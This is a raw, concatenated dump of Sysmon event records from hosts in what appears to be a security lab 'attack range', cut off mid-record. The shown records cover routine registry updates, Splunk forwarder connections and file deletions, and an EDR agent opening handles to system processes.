13241300x800000000000000015986Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b37-0x398920aa) 13241300x800000000000000015985Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b3f-0x9b4d88aa) 13241300x800000000000000015984Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000008) 13241300x800000000000000015983Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x001e49f7) 13241300x800000000000000015982Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d92b2e-0xd7c4b8aa) 13241300x800000000000000015981Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d92b37-0x398920aa) 13241300x800000000000000015980Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-SetValue2023-01-18 12:20:17.427{E5A8D418-DC43-63C7-0B00-00000000B002}632C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d92b3f-0x9b4d88aa) 354300x800000000000000041291Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:14.609{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56275-false10.0.1.12-8000- 23542300x800000000000000041290Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:17.118{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BA9EB4D256AF0E296EE1D83702FEC52,SHA256=1F32DE753C5B88B072B417E00AFEFE576358AFF2AB4204C832EB811A2A69CA4B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015991Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:18.487{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD00EFD154754B7B8F213B4672B7C51B,SHA256=B42A830F15F3C487B06F8B2A0B1EC631122CF3A9B1054F99C2400EE881D035DD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041292Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:18.196{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9900E04B2205E30754280AB7BAD5377D,SHA256=C1B23C7104BF422FF8D134017A366452ADB49848C4A468568730F567745E2D7C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015993Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:19.572{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D741144E49771CD39306E9449898E660,SHA256=E316CC1C3D75D5B951BC23F977F8CF9459176CFB75071E7F85E47942571F59E3,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000015992Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:18.069{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-ctus-attack-range-933.us-east-2.compute.internal50076-false10.0.1.12ip-10-0-1-12.us-east-2.compute.internal8000- 23542300x800000000000000041293Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:19.273{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BC03A3898FD914F6144F9CF57A7F69D0,SHA256=6B69471B730DEA9CEA63180D05CB35959AA67B5C80C8BE9FC4505BE6B9514D7D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015994Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:20.870{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0E2D8A3E23B1A8378F1C8008FBB0E070,SHA256=D1B9718E9A5E06FFA21E2C39DD9927CDF7C6B7A77E24378EBB9C7926095E6AF9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041294Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:20.335{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7F957DF7F62266C500020D773DD9B479,SHA256=14E1E7274174023F091FD8A7A15CCA50223DFBE7F90E66418715AF1E7E36F75D,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015995Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:21.963{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D0478831C72F4789D5D9DBA1946A2D93,SHA256=1F28A398A14CF8A4542C275BDF7B551437447297D7E4659953AF6094992BD8C2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000041295Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:21.417{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E1D9B3DA00E5B2ABC8C97686EA576E55,SHA256=BA986568D1ED48C826CFF9D698C6F752974745D07712A9F5C789A46D8103BDB3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000041297Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:20.617{FE4C2B44-DA6F-63C7-DB00-00000000AF02}4048C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-ctus-attack-range-271.attackrange.local56276-false10.0.1.12-8000- 23542300x800000000000000041296Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:20:22.477{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=091B674928EA745FEF64DBEEB96DB5A4,SHA256=C7A91E7A2DAA33FD5BF0D60FD213700AA78554E60F2975B44DBB027AFA171A08,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016026Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.760{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCCE-63C7-EB00-00000000B002}3756C:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016025Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC7-63C7-D000-00000000B002}3144C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016024Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.757{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-A300-00000000B002}968C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016023Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.751{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016022Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.746{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DCBE-63C7-9400-00000000B002}4004C:\Windows\System32\msdtc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016021Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.744{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5300-00000000B002}3348C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016020Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.744{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC4A-63C7-5200-00000000B002}3336C:\Windows\system32\WinrsHost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016019Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.740{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3E00-00000000B002}344C:\Windows\system32\wbem\wmiprvse.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016018Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.739{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC47-63C7-3900-00000000B002}1148C:\Windows\system32\conhost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016017Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.735{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC46-63C7-3500-00000000B002}2744C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016016Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.734{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC45-63C7-2200-00000000B002}2524C:\Windows\system32\wbem\unsecapp.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016015Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.720{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016014Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.717{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1E00-00000000B002}1200C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016013Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.714{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1D00-00000000B002}1080C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016012Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.707{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1B00-00000000B002}1944C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016011Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.704{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1900-00000000B002}1888C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016010Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.693{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1800-00000000B002}1804C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016009Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.688{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1700-00000000B002}1260C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016008Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.654{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1600-00000000B002}1224C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016007Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.645{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1500-00000000B002}1104C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016006Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:20:22.624{E5A8D418-DC44-63C7-1C00-00000000B002}20203024C:\Program Files\Aurora-Agent\aurora-agent.exe{E5A8D418-DC44-63C7-1400-00000000B002}1084C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000013100190) 10341000x800000000000000016005Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 